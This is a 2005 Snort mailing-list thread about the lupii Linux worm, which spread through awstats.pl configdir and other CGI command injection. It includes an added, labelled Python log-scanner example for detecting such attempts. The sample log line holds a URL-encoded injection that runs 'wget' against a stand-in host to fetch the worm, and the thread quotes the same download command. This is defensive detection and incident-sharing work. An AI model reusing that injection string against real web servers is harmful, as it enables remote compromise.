Snort mailing list archives

Update: Worm/Virus related to SID 3813: "WEB-CGI awstats.pl configdir command execution attempt" and other SIDs?


From: TPanaitescu () colorcon com
Date: Sat, 5 Nov 2005 11:43:54 -0400

Hi,

I couldn't help it and I ran the program, of course with a sniffer on.
Syntax: lupii <IP_address_of_the_reporting_host>

Here's what I found:
1. runs on RedHat Enterprise Workstation 4
2. opens up udp:7222
3. exchanges some info with <IP_address_of_the_reporting_host> over udp 7222
4. remains active in the background
5. starts a SYN scan to port 80 on random destinations; in this particular example it used a class A address, keeping the first 2 octets unchanged and changing just the last 2 octets of the address, in order from X.Y.0.0 to X.Y.z.w.
6. it doesn't seem to be downloading anything from the Internet
7. it tries several ways to infect the scanned system, all based on CGI command execution/code injection: awstats.pl, webhints, xml-rpc for php etc. You can see all these if you look at the program code.

I stopped the program but I have the capture.

Any news from anybody else?

Tudor

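Added example, not part of Tudor's post: a small log-side check a web-server owner could run to spot the awstats.pl configdir injection attempts this thread describes and pull out the host the payload tries to fetch from, so it can be blocked and reported. The access-log lines, IP addresses and download host below are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache combined-format log lines; addresses are from
# documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), not real traffic.
SAMPLE_LOG = """\
192.0.2.44 - - [05/Nov/2005:02:13:07 -0400] "GET /cgi-bin/awstats.pl?configdir=%7Cwget%20198.51.100.7%2Flupii%7C HTTP/1.1" 404 291 "-" "Mozilla/4.0"
192.0.2.44 - - [05/Nov/2005:02:13:09 -0400] "GET /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0"
203.0.113.9 - - [05/Nov/2005:02:14:11 -0400] "GET /cgi-bin/awstats.pl?config=site1&configdir=%2Fetc%2Fawstats HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: source IP, timestamp, request target and status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate configdir is a filesystem path; shell metacharacters mean injection.
SHELL_META = re.compile(r'[|;`$()]')
# Host the injected command tries to download from (the "wget <IP>/lupii" seen in the thread).
FETCH_RE = re.compile(r'\b(?:wget|curl)\s+(?:https?://)?([\w.\-]+)', re.IGNORECASE)


def inspect_line(line):
    """Return a finding for an awstats.pl configdir injection attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("awstats.pl"):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("configdir", []):
        value = unquote(raw)  # parse_qs decoded once; a second pass catches double encoding
        if SHELL_META.search(value):
            fetch = FETCH_RE.search(value)
            return {"src": m.group("src"), "ts": m.group("ts"), "status": m.group("status"),
                    "configdir": value, "download_host": fetch.group(1) if fetch else None}
    return None


def scan_log(text):
    """Run inspect_line over every line and keep only the hits."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The 404 in the first constructed line is the normal case where the script is not installed; the request is still worth alerting on, since the same source is likely to try the other CGI paths Tudor lists.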

__________________

Hi again everyone,

Got the same thing a few minutes ago, coming from China this time, pointing to the same address for the download.... Seems to be spreading? The downloaded file is definitely for Linux.

Tudor

__________________

Hi everyone,

Last night I caught an attack on my web servers here; the attack consisted of command execution attempts using various CGI vulnerabilities. The fact is that after looking at the payload of all connection attempts, they all had a "wget <IP Address>/lupii", same IP address; I can send it to the list if anybody needs it. I downloaded the file from that site, it is an ELF executable and it seems to be a backdoor of some sort reporting back to the site. The attack was coming from Taiwan and the download site was in Norway.

I am not good at looking at ELF format programs, is anybody willing to take a look? I can send the file on demand. Does anybody know what this is all about?

Thanks,
Tudor
